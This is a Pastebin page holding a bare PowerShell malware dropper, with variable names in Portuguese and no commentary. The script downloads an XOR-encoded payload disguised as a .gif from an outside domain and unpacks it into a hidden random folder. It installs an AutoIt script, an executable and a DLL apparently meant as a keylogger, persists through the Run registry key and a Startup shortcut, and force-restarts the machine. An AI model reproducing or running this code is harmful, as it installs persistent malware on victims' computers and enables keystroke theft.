Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $strCaminhoArquivoLog = "$env:ALLUSERSPROFILE\$([System.DateTime]::Now.ToString('yyy2020.ini'))"
- $bExisteArquivoLog = [System.IO.File]::Exists($strCaminhoArquivoLog)
- function gera-strrand
- {
- -join ((65..90) + (97..122) | Get-Random -Count $args[0] | % {[char]$_})
- }
- if (-Not $bExisteArquivoLog)
- {
- "" | Set-Content $strCaminhoArquivoLog
- $NomePasta = gera-strrand 3
- $Directory = "." + $NomePasta
- $array = (0..4)
- $array[0] = [environment]::getfolderpath("MyDocuments")
- $array[1] = [environment]::getfolderpath("MyMusic")
- $array[2] = [environment]::getfolderpath("MyPictures")
- $array[3] = [environment]::getfolderpath("Templates")
- $Num = Get-Random -Maximum 4
- $strCaminhoPastaCaixa = $array[$Num] + "\" + $Directory + "\"
- New-Item -ItemType directory -Path $strCaminhoPastaCaixa
- $strCaminhoCaixaZipada = gera-strrand 8
- $strCaminhoCaixaZipada = "$strCaminhoPastaCaixa$strCaminhoCaixaZipada.zip"
- $strUrlCaixaZipada = "https://fasts-hoping-ultra.cash/mdlins32/mdl32.gif"
- (New-Object System.Net.WebClient).DownloadFile($strUrlCaixaZipada, $strCaminhoCaixaZipada)
- $objBytesCaixaZipada = [System.IO.File]::ReadAllBytes($strCaminhoCaixaZipada)
- for($i=0; $i -lt $objBytesCaixaZipada.count; $i++)
- {
- $objBytesCaixaZipada[$i] = $objBytesCaixaZipada[$i] -bxor 0x91
- }
- [System.IO.File]::WriteAllBytes($strCaminhoCaixaZipada,$objBytesCaixaZipada)
- $objArrayArqsZip = New-Object System.Collections.ArrayList
- $objShelApplication = New-Object -com shell.application
- $objArquivoZipado = $objShelApplication.NameSpace($strCaminhoCaixaZipada)
- foreach($item in $objArquivoZipado.items())
- {
- $objShelApplication.Namespace($strCaminhoPastaCaixa).copyhere($item)
- $objArrayArqsZip.Add($item.name)
- }
- $strNomeModuloDllKl = gera-strrand 7
- $strExtModuloDllKl = gera-strrand 3
- $strNomeModuloDllKl = $strNomeModuloDllKl + "." + $strExtModuloDllKl
- $strPathModuloDllKl = $strCaminhoPastaCaixa + $strNomeModuloDllKl
- $strNomeModuloExecutor = gera-strrand 5
- $strNomeModuloExecutor = $strNomeModuloExecutor + ".exe"
- $strPathModuloExecutor = $strCaminhoPastaCaixa + $strNomeModuloExecutor
- $strNomeScriptAutoIt = gera-strrand 8
- $strPathScriptAutoIt = $strCaminhoPastaCaixa + $strNomeScriptAutoIt
- foreach ($element in $objArrayArqsZip)
- {
- $intTamArquivo = (Get-Item "$strCaminhoPastaCaixa$element").Length
- if ($intTamArquivo -lt 2000)
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathScriptAutoIt
- }
- elseif ($intTamArquivo -lt 1000000)
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloExecutor
- }
- else
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloDllKl
- }
- }
- Start-Sleep -s 5
- Remove-Item -Path $strCaminhoCaixaZipada -Force
- $registryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
- $Name = $strUser
- $value = "$([char]34)$strPathModuloExecutor$([char]34) $([char]34)$strPathScriptAutoIt$([char]34)
- $([char]34)$strPathModuloDllKl$([char]34)"
- New-Item -Path $registryPath -Force | Out-Null
- New-ItemProperty -Path $registryPath -Name $name -Value $value -Force | Out-Null
- $strNomeLNK = $env:UserName
- $objShell = New-Object -ComObject ("WScript.Shell")
- $startup = [environment]::getfolderpath("Startup")
- $objShortCut = $objShell.CreateShortcut($startup + "\" + $strNomeLNK + ".lnk")
- $objShortCut.TargetPath = $strPathModuloExecutor
- $objShortCut.Description = $strNomeModuloExecutor
- $objShortCut.Arguments = "$strNomeScriptAutoIt $strNomeModuloDllKl"
- $objShortCut.WorkingDirectory = $strCaminhoPastaCaixa
- $objShortCut.Hotkey = "CTRL+SHIFT+F"
- $objShortCut.IconLocation = "Shell32.dll, 29";
- $objShortCut.Description = gera-strrand 50
- $objShortCut.Save()
- Restart-Computer -F
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
